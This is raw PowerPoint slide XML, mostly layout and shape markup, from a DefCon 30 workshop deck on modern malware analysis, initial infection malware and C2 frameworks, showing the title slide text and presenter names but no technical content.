            <a:off x="11027090" y="5822212"/>
            <a:ext cx="1324164" cy="1324164"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:softEdge rad="112500"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="264596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9024" y="71394"/>
            <a:ext cx="10738221" cy="922137"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="3600" b="0" cap="none" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{835724FA-D287-F042-A50D-440303D70BAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483578" y="6484294"/>
            <a:ext cx="1237839" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The 3 Malware Amigos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5537F9D8-8DF5-D549-B114-5CE0E3BB477E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4640872" y="1097670"/>
            <a:ext cx="2910255" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="53975"/>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9465E4-9322-BE49-A83C-DDBA4C9F91AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="50000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11027090" y="5822212"/>
            <a:ext cx="1324164" cy="1324164"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:softEdge rad="112500"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63C77B35-E8D2-7440-A12A-221367FE9444}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="70000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1771651" y="6484294"/>
            <a:ext cx="721292" cy="210944"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="182436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835724FA-D287-F042-A50D-440303D70BAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483578" y="6484294"/>
            <a:ext cx="1237839" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The 3 Malware Amigos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6" name="Graphic 5" descr="Questions with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1980C9D-B1B2-E042-B5E9-667C682FE4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9527" y="885617"/>
            <a:ext cx="3792946" cy="3792946"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FDDDA74-E2AA-DC4C-BF99-5739FBDA6331}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5181166"/>
            <a:ext cx="12192000" cy="1080902"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr sz="4800" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="3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DD3F561-88A2-0342-8546-4F8C3B0C1CC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix amt="50000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11027090" y="5822212"/>
            <a:ext cx="1324164" cy="1324164"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:softEdge rad="112500"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="48533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a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86E5AAEE-A7C3-9144-934A-C95159431694}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/12/2022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8D230E4D-4BFD-BB41-8D6B-6EA50E4AE7B5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="274849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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28151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964424" y="6272784"/>
            <a:ext cx="3273552" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86E5AAEE-A7C3-9144-934A-C95159431694}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/12/2022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8D230E4D-4BFD-BB41-8D6B-6EA50E4AE7B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3813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9848" y="2769576"/>
            <a:ext cx="10058400" cy="29805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932176" y="6199632"/>
            <a:ext cx="6327648" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="14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The 3 Malware Amigos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7938561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6" r:id="rId3"/>
    <p:sldLayoutId id="2147483677" r:id="rId4"/>
    <p:sldLayoutId id="2147483678" r:id="rId5"/>
    <p:sldLayoutId id="2147483679"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3" r:id="rId16"/>
    <p:sldLayoutId id="2147483674" r:id="rId17"/>
    <p:sldLayoutId id="2147483675" r:id="rId18"/>
    <p:sldLayoutId id="2147483680" r:id="rId19"/>
    <p:sldLayoutId id="2147483681" r:id="rId20"/>
    <p:sldLayoutId id="2147483682" r:id="rId21"/>
    <p:sldLayoutId id="2147483683" r:id="rId22"/>
    <p:sldLayoutId id="2147483684" r:id="rId23"/>
  </p:sldLayoutIdLst>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr lang="en-US" sz="5400" kern="1200" cap="all" baseline="0" dirty="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>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witter.com/cobaltstrikebo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or528.com/dfirreport-cs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22B115F-89D4-47C2-84D4-1E315037C9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9" name="Oval 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0890B36C-8F31-4F4A-A665-095928EFD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0" name="Oval 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D61FFA7-532F-46DD-9402-6B9E338BA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32" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{472095BC-C06B-45BD-A206-0F75C6A4A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5" name="Title 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B71D0C2-0253-E64E-B9A0-CFE1BA39D6B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6011838" y="2681784"/>
            <a:ext cx="5567354" cy="1407494"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:blipFill>
                  <a:blip r:embed="rId5">
                    <a:extLst>
                      <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                        <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                      </a:ext>
                    </a:extLst>
                  </a:blip>
                  <a:tile tx="6350" ty="-127000" sx="65000" sy="64000" flip="none" algn="tl"/>
                </a:blipFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>The Art of Modern Malware Analysis: Initial Infection Malware, Infrastructure, and C2 Frameworks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{571CE906-0565-6E4A-A055-FE554FF33B09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect r="-4" b="9398"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5233763" y="10"/>
            <a:ext cx="4480560" cy="2516773"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>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p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Freeform: Shape 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D40AAF3-394B-453B-8AF1-B796F8F9F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0"/>
            <a:ext cx="4480560" cy="2516783"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 273471 w 4480560"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2516783"/>
              <a:gd name="connsiteX1" fmla="*/ 4207090 w 4480560"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2516783"/>
              <a:gd name="connsiteX2" fmla="*/ 4218264 w 4480560"/>
              <a:gd name="connsiteY2" fmla="*/ 73216 h 2516783"/>
              <a:gd name="connsiteX3" fmla="*/ 4228529 w 4480560"/>
              <a:gd name="connsiteY3" fmla="*/ 276503 h 2516783"/>
              <a:gd name="connsiteX4" fmla="*/ 2240280 w 4480560"/>
              <a:gd name="connsiteY4" fmla="*/ 2264752 h 2516783"/>
              <a:gd name="connsiteX5" fmla="*/ 252032 w 4480560"/>
              <a:gd name="connsiteY5" fmla="*/ 276503 h 2516783"/>
              <a:gd name="connsiteX6" fmla="*/ 262297 w 4480560"/>
              <a:gd name="connsiteY6" fmla="*/ 73216 h 2516783"/>
              <a:gd name="connsiteX7" fmla="*/ 18808 w 4480560"/>
              <a:gd name="connsiteY7" fmla="*/ 0 h 2516783"/>
              <a:gd name="connsiteX8" fmla="*/ 216879 w 4480560"/>
              <a:gd name="connsiteY8" fmla="*/ 0 h 2516783"/>
              <a:gd name="connsiteX9" fmla="*/ 206579 w 4480560"/>
              <a:gd name="connsiteY9" fmla="*/ 67490 h 2516783"/>
              <a:gd name="connsiteX10" fmla="*/ 196025 w 4480560"/>
              <a:gd name="connsiteY10" fmla="*/ 276503 h 2516783"/>
              <a:gd name="connsiteX11" fmla="*/ 2240280 w 4480560"/>
              <a:gd name="connsiteY11" fmla="*/ 2320759 h 2516783"/>
              <a:gd name="connsiteX12" fmla="*/ 4284535 w 4480560"/>
              <a:gd name="connsiteY12" fmla="*/ 276503 h 2516783"/>
              <a:gd name="connsiteX13" fmla="*/ 4273981 w 4480560"/>
              <a:gd name="connsiteY13" fmla="*/ 67490 h 2516783"/>
              <a:gd name="connsiteX14" fmla="*/ 4263681 w 4480560"/>
              <a:gd name="connsiteY14" fmla="*/ 0 h 2516783"/>
              <a:gd name="connsiteX15" fmla="*/ 4461752 w 4480560"/>
              <a:gd name="connsiteY15" fmla="*/ 0 h 2516783"/>
              <a:gd name="connsiteX16" fmla="*/ 4468994 w 4480560"/>
              <a:gd name="connsiteY16" fmla="*/ 47447 h 2516783"/>
              <a:gd name="connsiteX17" fmla="*/ 4480560 w 4480560"/>
              <a:gd name="connsiteY17" fmla="*/ 276503 h 2516783"/>
              <a:gd name="connsiteX18" fmla="*/ 2240280 w 4480560"/>
              <a:gd name="connsiteY18" fmla="*/ 2516783 h 2516783"/>
              <a:gd name="connsiteX19" fmla="*/ 0 w 4480560"/>
              <a:gd name="connsiteY19" fmla="*/ 276503 h 2516783"/>
              <a:gd name="connsiteX20" fmla="*/ 11567 w 4480560"/>
              <a:gd name="connsiteY20" fmla="*/ 47447 h 251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8">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3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F32CC16-F301-DF49-B407-9D516B50A82C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6175588" y="4189863"/>
            <a:ext cx="5226137" cy="1982336"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DefCon 30 Workshop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-182880" algn="l">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pP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Josh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">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Stroschein</a:t>
            </a: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	[@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">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jstrosch</a:t>
            </a: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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-182880" algn="l">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pP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Aaron </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">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Rosenmund</a:t>
            </a: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	[@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">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arosenmund</a:t>
            </a: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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-182880" algn="l">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ln>
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:alpha val="28000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="50800" dir="5400000" sx="1000" sy="1000" algn="ctr" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Ryan Chapman	[@rj_chap]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC7E823A-9CD6-574C-8CC0-EA99F6E0EF56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9"/>
          <a:srcRect l="4333" r="14022"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="537668"/>
            <a:ext cx="5681184" cy="6320333"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>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p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Freeform: Shape 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4D0672D-43C7-420C-A186-48122D7CD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667"/>
            <a:ext cx="5681204" cy="6320333"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5681204"/>
              <a:gd name="connsiteY0" fmla="*/ 5597835 h 6320333"/>
              <a:gd name="connsiteX1" fmla="*/ 39695 w 5681204"/>
              <a:gd name="connsiteY1" fmla="*/ 5641510 h 6320333"/>
              <a:gd name="connsiteX2" fmla="*/ 1034272 w 5681204"/>
              <a:gd name="connsiteY2" fmla="*/ 6312073 h 6320333"/>
              <a:gd name="connsiteX3" fmla="*/ 1056841 w 5681204"/>
              <a:gd name="connsiteY3" fmla="*/ 6320333 h 6320333"/>
              <a:gd name="connsiteX4" fmla="*/ 413612 w 5681204"/>
              <a:gd name="connsiteY4" fmla="*/ 6320333 h 6320333"/>
              <a:gd name="connsiteX5" fmla="*/ 300961 w 5681204"/>
              <a:gd name="connsiteY5" fmla="*/ 6249073 h 6320333"/>
              <a:gd name="connsiteX6" fmla="*/ 71042 w 5681204"/>
              <a:gd name="connsiteY6" fmla="*/ 6074983 h 6320333"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 5681204"/>
              <a:gd name="connsiteY7" fmla="*/ 6010415 h 6320333"/>
              <a:gd name="connsiteX8" fmla="*/ 2252205 w 5681204"/>
              <a:gd name="connsiteY8" fmla="*/ 385763 h 6320333"/>
              <a:gd name="connsiteX9" fmla="*/ 5295442 w 5681204"/>
              <a:gd name="connsiteY9" fmla="*/ 3429000 h 6320333"/>
              <a:gd name="connsiteX10" fmla="*/ 3436771 w 5681204"/>
              <a:gd name="connsiteY10" fmla="*/ 6233085 h 6320333"/>
              <a:gd name="connsiteX11" fmla="*/ 3198390 w 5681204"/>
              <a:gd name="connsiteY11" fmla="*/ 6320333 h 6320333"/>
              <a:gd name="connsiteX12" fmla="*/ 1306021 w 5681204"/>
              <a:gd name="connsiteY12" fmla="*/ 6320333 h 6320333"/>
              <a:gd name="connsiteX13" fmla="*/ 1067639 w 5681204"/>
              <a:gd name="connsiteY13" fmla="*/ 6233085 h 6320333"/>
              <a:gd name="connsiteX14" fmla="*/ 100311 w 5681204"/>
              <a:gd name="connsiteY14" fmla="*/ 5580893 h 6320333"/>
              <a:gd name="connsiteX15" fmla="*/ 0 w 5681204"/>
              <a:gd name="connsiteY15" fmla="*/ 5470524 h 6320333"/>
              <a:gd name="connsiteX16" fmla="*/ 0 w 5681204"/>
              <a:gd name="connsiteY16" fmla="*/ 1387476 h 6320333"/>
              <a:gd name="connsiteX17" fmla="*/ 100311 w 5681204"/>
              <a:gd name="connsiteY17" fmla="*/ 1277106 h 6320333"/>
              <a:gd name="connsiteX18" fmla="*/ 2252205 w 5681204"/>
              <a:gd name="connsiteY18" fmla="*/ 385763 h 6320333"/>
              <a:gd name="connsiteX19" fmla="*/ 2252205 w 5681204"/>
              <a:gd name="connsiteY19" fmla="*/ 0 h 6320333"/>
              <a:gd name="connsiteX20" fmla="*/ 5681204 w 5681204"/>
              <a:gd name="connsiteY20" fmla="*/ 3429000 h 6320333"/>
              <a:gd name="connsiteX21" fmla="*/ 4169391 w 5681204"/>
              <a:gd name="connsiteY21" fmla="*/ 6272380 h 6320333"/>
              <a:gd name="connsiteX22" fmla="*/ 4090458 w 5681204"/>
              <a:gd name="connsiteY22" fmla="*/ 6320333 h 6320333"/>
              <a:gd name="connsiteX23" fmla="*/ 3447569 w 5681204"/>
              <a:gd name="connsiteY23" fmla="*/ 6320333 h 6320333"/>
              <a:gd name="connsiteX24" fmla="*/ 3470138 w 5681204"/>
              <a:gd name="connsiteY24" fmla="*/ 6312073 h 6320333"/>
              <a:gd name="connsiteX25" fmla="*/ 5381167 w 5681204"/>
              <a:gd name="connsiteY25" fmla="*/ 3429000 h 6320333"/>
              <a:gd name="connsiteX26" fmla="*/ 2252205 w 5681204"/>
              <a:gd name="connsiteY26" fmla="*/ 300038 h 6320333"/>
              <a:gd name="connsiteX27" fmla="*/ 39695 w 5681204"/>
              <a:gd name="connsiteY27" fmla="*/ 1216490 h 6320333"/>
              <a:gd name="connsiteX28" fmla="*/ 0 w 5681204"/>
              <a:gd name="connsiteY28" fmla="*/ 1260165 h 6320333"/>
              <a:gd name="connsiteX29" fmla="*/ 0 w 5681204"/>
              <a:gd name="connsiteY29" fmla="*/ 847584 h 6320333"/>
              <a:gd name="connsiteX30" fmla="*/ 71042 w 5681204"/>
              <a:gd name="connsiteY30" fmla="*/ 783017 h 6320333"/>
              <a:gd name="connsiteX31" fmla="*/ 2252205 w 5681204"/>
              <a:gd name="connsiteY31" fmla="*/ 0 h 63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8">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pSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="38" name="Group 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D96E3E53-A85C-4F1C-8D49-274B2858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9" name="Oval 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B18F255-8818-4B29-BE51-E6C53C9AA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40" name="Oval 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B9FAC86-F2AD-430F-A01E-366FAC8A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819586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E72D6A-39AF-0CE4-CB79-62BCD3D572D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
